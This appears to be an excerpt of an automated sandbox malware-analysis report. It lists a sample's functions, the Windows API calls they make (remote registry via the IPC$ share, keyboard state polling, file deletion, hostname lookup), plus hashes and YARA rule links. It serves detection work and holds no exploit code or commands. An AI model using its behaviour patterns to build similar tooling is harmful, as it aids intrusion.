                                                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                • API String ID: 2116804098-2391861430
                                                                                                                • Opcode ID: 8c6c212e9a89c3d743e6cb94ca69864333ec9a417bd6ffbd66082031f674479d
                                                                                                                • Instruction ID: 325e096f6bac9c632ebd6fc6eb380f851af039d31aabb21cd7afdb0783b63527
                                                                                                                • Opcode Fuzzy Hash: 8c6c212e9a89c3d743e6cb94ca69864333ec9a417bd6ffbd66082031f674479d
                                                                                                                • Instruction Fuzzy Hash: 3351A371920209BACB15EFA0DD46EEEB779AF04300F104566F505B20A2EB716F78DFA1
                                                                                                                Function 0024D338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0024D37F
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0024D3A0
                                                                                                                • __swprintf.LIBCMT ref: 0024D3F3
                                                                                                                • _wprintf.LIBCMT ref: 0024D499
                                                                                                                • _wprintf.LIBCMT ref: 0024D4B7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                • API String ID: 2116804098-3420473620
                                                                                                                • Opcode ID: 8e9c110a7f7ec5db37dac5bcbbd208fde24cf22bcb441400b9f0c73bb20eb3cb
                                                                                                                • Instruction ID: 13379e5d8f0486b7ad56c634c5c051232acfe0d44353c6fb40168c2e7967be3a
                                                                                                                • Opcode Fuzzy Hash: 8e9c110a7f7ec5db37dac5bcbbd208fde24cf22bcb441400b9f0c73bb20eb3cb
                                                                                                                • Instruction Fuzzy Hash: 6A518171920209BACB19EFA0DD46EEEB779AF14700F104466F105B20A2EB716F78DF61
                                                                                                                Function 0023AEE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00207E53: _memmove.LIBCMT ref: 00207EB9
                                                                                                                • _memset.LIBCMT ref: 0023AF74
                                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0023AFA9
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0023AFC5
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0023AFE1
                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0023B00B
                                                                                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0023B033
                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0023B03E
                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0023B043
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                • API String ID: 1411258926-22481851
                                                                                                                • Opcode ID: dbf1a8136ccaaa7cca35c53cc516b7bdfdb76e4eb8e554bc0a78f3a0b462bf7e
                                                                                                                • Instruction ID: cfc95166ff66345569090cbbf6108bbb15cd51c953a2f754ab62e6f07987c047
                                                                                                                • Opcode Fuzzy Hash: dbf1a8136ccaaa7cca35c53cc516b7bdfdb76e4eb8e554bc0a78f3a0b462bf7e
                                                                                                                • Instruction Fuzzy Hash: EA411A76C2122DABDF11EFA4DC85DEEB7B8BF14740F004169E901A21A1DB719E25CF51
                                                                                                                Function 00247212 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __swprintf.LIBCMT ref: 00247226
                                                                                                                • __swprintf.LIBCMT ref: 00247233
                                                                                                                  • Part of subcall function 0022234B: __woutput_l.LIBCMT ref: 002223A4
                                                                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 0024725D
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00247269
                                                                                                                • LockResource.KERNEL32(00000000), ref: 00247276
                                                                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 00247296
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 002472A8
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 002472B7
                                                                                                                • LockResource.KERNEL32(?), ref: 002472C3
                                                                                                                • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00247322
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                • String ID: L6+
                                                                                                                • API String ID: 1433390588-2741093763
                                                                                                                • Opcode ID: 7bd55697e1c71a13d6bd6617046ff3f35f18727bde9bb9193b702a2daaf83ff7
                                                                                                                • Instruction ID: 01ec14c1e8649be7b24a13a90662ba482cee988db94743294832702256f4d643
                                                                                                                • Opcode Fuzzy Hash: 7bd55697e1c71a13d6bd6617046ff3f35f18727bde9bb9193b702a2daaf83ff7
                                                                                                                • Instruction Fuzzy Hash: B431BCB591525ABBCB05DFA0EC89EAFBBA8FF08340F004425FD12D2191E774D964DBA0
                                                                                                                Function 002483D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00207E53: _memmove.LIBCMT ref: 00207EB9
                                                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0024843F
                                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00248455
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00248466
                                                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00248478
                                                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00248489
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: SendString$_memmove
                                                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                • API String ID: 2279737902-1007645807
                                                                                                                • Opcode ID: 1300c7adfaeb0a672389f9ed3c58b38f536ed4498bcbe8360ddecbc38d29e343
                                                                                                                • Instruction ID: e299062bf674e27e2a9d39276c230ab3ddcfd5b74b8f95c456da8fdfd3ee9882
                                                                                                                • Opcode Fuzzy Hash: 1300c7adfaeb0a672389f9ed3c58b38f536ed4498bcbe8360ddecbc38d29e343
                                                                                                                • Instruction Fuzzy Hash: 1A11EB65A7025E79D714EBA1CC4ADFFBB7CEB92B40F0004297411A20C1DEB05E24C9B1
                                                                                                                Function 00248097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • timeGetTime.WINMM ref: 0024809C
                                                                                                                  • Part of subcall function 0021E3A5: timeGetTime.WINMM(?,76C1B400,00276163), ref: 0021E3A9
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 002480C8
                                                                                                                • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 002480EC
                                                                                                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 0024810E
                                                                                                                • SetActiveWindow.USER32 ref: 0024812D
                                                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0024813B
                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0024815A
                                                                                                                • Sleep.KERNEL32(000000FA), ref: 00248165
                                                                                                                • IsWindow.USER32 ref: 00248171
                                                                                                                • EndDialog.USER32(00000000), ref: 00248182
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                • String ID: BUTTON
                                                                                                                • API String ID: 1194449130-3405671355
                                                                                                                • Opcode ID: 6fb2071a6e5339e3d86179dfdf7cf22252628c30512718a56f93b5f01cd1a5f7
                                                                                                                • Instruction ID: d4a286bcd6b8c839a30c0f55161ec5028a12ffbfebf765356d6bc42bce3758b4
                                                                                                                • Opcode Fuzzy Hash: 6fb2071a6e5339e3d86179dfdf7cf22252628c30512718a56f93b5f01cd1a5f7
                                                                                                                • Instruction Fuzzy Hash: 1621D174270205BFE72AAF61FC8CE2B7BAAFB04389B044515F509822A1DF724D299B10
                                                                                                                Function 002478EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                • String ID: 0.0.0.0
                                                                                                                • API String ID: 208665112-3771769585
                                                                                                                • Opcode ID: 9e3d83fe2be228429b98ad9f8fb906b6b971c6a68a41215a179021b5059195da
                                                                                                                • Instruction ID: 29b3d7ef9555efbd885ad692598e28d9da2f8747b264554f37715604a86e2f78
                                                                                                                • Opcode Fuzzy Hash: 9e3d83fe2be228429b98ad9f8fb906b6b971c6a68a41215a179021b5059195da
                                                                                                                • Instruction Fuzzy Hash: CA110A35928116BFDB28AB70EC4AEDE77BCEF01720F000065F455A6091EF70DBA58B60
                                                                                                                Function 0024C890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0024C6A0: __time64.LIBCMT ref: 0024C6AA
                                                                                                                  • Part of subcall function 002041A7: _fseek.LIBCMT ref: 002041BF
                                                                                                                • __wsplitpath.LIBCMT ref: 0024C96F
                                                                                                                  • Part of subcall function 0022297D: __wsplitpath_helper.LIBCMT ref: 002229BD
                                                                                                                • _wcscpy.LIBCMT ref: 0024C982
                                                                                                                • _wcscat.LIBCMT ref: 0024C995
                                                                                                                • __wsplitpath.LIBCMT ref: 0024C9BA
                                                                                                                • _wcscat.LIBCMT ref: 0024C9D0
                                                                                                                • _wcscat.LIBCMT ref: 0024C9E3
                                                                                                                  • Part of subcall function 0024C6E4: _memmove.LIBCMT ref: 0024C71D
                                                                                                                  • Part of subcall function 0024C6E4: _memmove.LIBCMT ref: 0024C72C
                                                                                                                • _wcscmp.LIBCMT ref: 0024C92A
                                                                                                                  • Part of subcall function 0024CE59: _wcscmp.LIBCMT ref: 0024CF49
                                                                                                                  • Part of subcall function 0024CE59: _wcscmp.LIBCMT ref: 0024CF5C
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0024CB8D
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0024CC24
                                                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0024CC3A
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0024CC4B
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0024CC5D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 152968663-0
                                                                                                                • Opcode ID: 91d5c2a05c6314dd7d98c2e22d2ee6937acd40f093dfbb837e0024de78e59b9d
                                                                                                                • Instruction ID: 81c3d61eed4d5862ef51f15ceb68e1253662f824ddd40c1f95c48ceaaf5cf9eb
                                                                                                                • Opcode Fuzzy Hash: 91d5c2a05c6314dd7d98c2e22d2ee6937acd40f093dfbb837e0024de78e59b9d
                                                                                                                • Instruction Fuzzy Hash: 3DC15AB1911229AECF14DFA5CC81EEEB7BDEF49310F1040AAF609E6151DB709A94CF61
                                                                                                                Function 002508D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 3566271842-0
                                                                                                                • Opcode ID: b205b6be9141ec4e6d146701fe46bf9c896d762395f37a84b5ee12fc62dd72de
                                                                                                                • Instruction ID: eb3eef11a8b92940f357ea8175f7481a2a027bf986c1f2f85660ec4b8449ec19
                                                                                                                • Opcode Fuzzy Hash: b205b6be9141ec4e6d146701fe46bf9c896d762395f37a84b5ee12fc62dd72de
                                                                                                                • Instruction Fuzzy Hash: 8D713DB5A10219AFDB14DFA4D888EDEB7B8FF48314F048495E909AB252D730EE54CF94
                                                                                                                Function 0024388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?), ref: 00243908
                                                                                                                • SetKeyboardState.USER32(?), ref: 00243973
                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00243993
                                                                                                                • GetKeyState.USER32(000000A0), ref: 002439AA
                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 002439D9
                                                                                                                • GetKeyState.USER32(000000A1), ref: 002439EA
                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00243A16
                                                                                                                • GetKeyState.USER32(00000011), ref: 00243A24
                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00243A4D
                                                                                                                • GetKeyState.USER32(00000012), ref: 00243A5B
                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00243A84
                                                                                                                • GetKeyState.USER32(0000005B), ref: 00243A92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 541375521-0
                                                                                                                • Opcode ID: b8872f86e9bd95fe8b32ffba1126f5a54425a75d65085333ceae147ef65c4c90
                                                                                                                • Instruction ID: a013fc79c138992d6a3e7c79ff4dbfa7e53798d05b75fe3711b9a1d9f99d1eae
                                                                                                                • Opcode Fuzzy Hash: b8872f86e9bd95fe8b32ffba1126f5a54425a75d65085333ceae147ef65c4c90
                                                                                                                • Instruction Fuzzy Hash: 6851C730A1479929FB39EFB488117EAFFF45F11340F08859ED5C25A1C2DA54AB9CCB62
                                                                                                                Function 0023FAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 0023FB19
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0023FB2B
                                                                                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0023FB89
                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 0023FB94
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0023FBA6
                                                                                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0023FBFC
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0023FC0A
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0023FC1B
                                                                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0023FC5E
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0023FC6C
                                                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0023FC89
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0023FC96
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                • String ID:
                                                                                                                • API String ID: 3096461208-0
                                                                                                                • Opcode ID: af5847069cdfb5aeefb9e7f257d0c2fbec43a430f5470d8e751c6356c307e4d6
                                                                                                                • Instruction ID: b0ae206d144aac9aea5e78db937809d81310dc912301b1ee4b28dc5fbf97fb58
                                                                                                                • Opcode Fuzzy Hash: af5847069cdfb5aeefb9e7f257d0c2fbec43a430f5470d8e751c6356c307e4d6
                                                                                                                • Instruction Fuzzy Hash: FF5133B5B00209AFDB08DF68ED99E6EBBBAEB88314F148539F915D72D0D7709D048B10
                                                                                                                Function 0021B86E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 002049CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00204954,00000000), ref: 00204A23
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0021B85B), ref: 0021B926
                                                                                                                • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0021B85B,00000000,?,?,0021AF1E,?,?), ref: 0021B9BD
                                                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 0027E775
                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0021B85B,00000000,?,?,0021AF1E,?,?), ref: 0027E7A6
                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0021B85B,00000000,?,?,0021AF1E,?,?), ref: 0027E7BD
                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0021B85B,00000000,?,?,0021AF1E,?,?), ref: 0027E7D9
                                                                                                                • DeleteObject.GDI32(00000000), ref: 0027E7EB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 641708696-0
                                                                                                                • Opcode ID: 9436cedc8ae7a781e539d44e03c2f1829d88d3146d60f66e1134ebc06e5d133d
                                                                                                                • Instruction ID: de44e343401a407cf80a12b01553cc81127343f8880f9150a235431001a777d2
                                                                                                                • Opcode Fuzzy Hash: 9436cedc8ae7a781e539d44e03c2f1829d88d3146d60f66e1134ebc06e5d133d
                                                                                                                • Instruction Fuzzy Hash: FA61CA34124702CFEB26AF25E88DB65B7F5FF6A311F114219E18A865B1C770A8B1DF50
                                                                                                                Function 0021B039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021B155: GetWindowLongW.USER32(?,000000EB), ref: 0021B166
                                                                                                                • GetSysColor.USER32(0000000F), ref: 0021B067
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ColorLongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 259745315-0
